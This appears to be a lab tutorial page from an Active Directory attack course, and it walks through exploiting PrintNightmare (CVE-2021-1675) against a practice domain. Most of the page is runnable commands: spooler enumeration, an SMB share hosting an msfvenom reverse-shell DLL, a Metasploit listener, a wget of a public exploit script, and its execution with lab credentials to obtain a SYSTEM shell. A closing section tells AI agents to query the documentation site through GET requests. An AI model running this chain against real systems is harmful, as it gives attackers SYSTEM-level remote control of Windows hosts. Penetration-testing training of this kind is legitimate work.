# Check and Prepare

### The Explanation

The print spooler service is started as the system account which is the highest account in windows that you can take over. You will trick the print spooler to install a new driver from an unc path and load that driver. In our case, a DLL file and once loaded will give the reverse shell to our kali machine. Because the print spooler service is started as System user it will be the system user calling back to the kali machine and not the non-privledged user we are using to install the driver.

To exploit printnightmare we will first check if the spooler is active on targets

### Check spooler is active

```
crackmapexec smb 192.168.56.10-23 -M spooler
```

<figure><img src="/files/V2oURJZd8Po4Ad8JI3gv" alt=""><figcaption></figcaption></figure>

```
rpcdump.py @192.168.56.10 | egrep 'MS-RPRN|MS-PAR'
```

<figure><img src="/files/udLTWaUm6XzdoDZcUJAc" alt=""><figcaption></figcaption></figure>

### Setup SMB to Host our .dll

```
sudo smbserver.py -smb2support "smb" /home/jefe/smb
```

<figure><img src="/files/GkJH0kdOIpaenxtOTMlh" alt=""><figcaption></figcaption></figure>

### Create Revershell and place it in the smb directory

```
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.56.31 LPORT=4444 -o /home/jefe/smb/remote.dll
```

<figure><img src="/files/W91MxlV6zd8fiSfCriRn" alt=""><figcaption></figcaption></figure>

### Setup the listener

```
msfconsole
use multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.56.31
set lport 4444
run
```

<figure><img src="/files/fACOxj1fhQK8naaPm5WK" alt=""><figcaption></figcaption></figure>

### Download and execute exploit

```
wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/main/SharpPrintNightmare/CVE-2021-1675.py
```

```
python3 CVE-2021-1675.py north.newyork.local/claudio.ortiz:babyboy@bronx.north.newyork.local '\\192.168.56.31\smb\remote.dll'
```

### Got Shell?

<figure><img src="/files/LCnznGz3KMHLNQM37qfj" alt=""><figcaption></figcaption></figure>

###


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://watchdogsacademy.gitbook.io/attacking-active-directory/exploiting-with-users/printnightmare-bronx/check-and-prepare.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.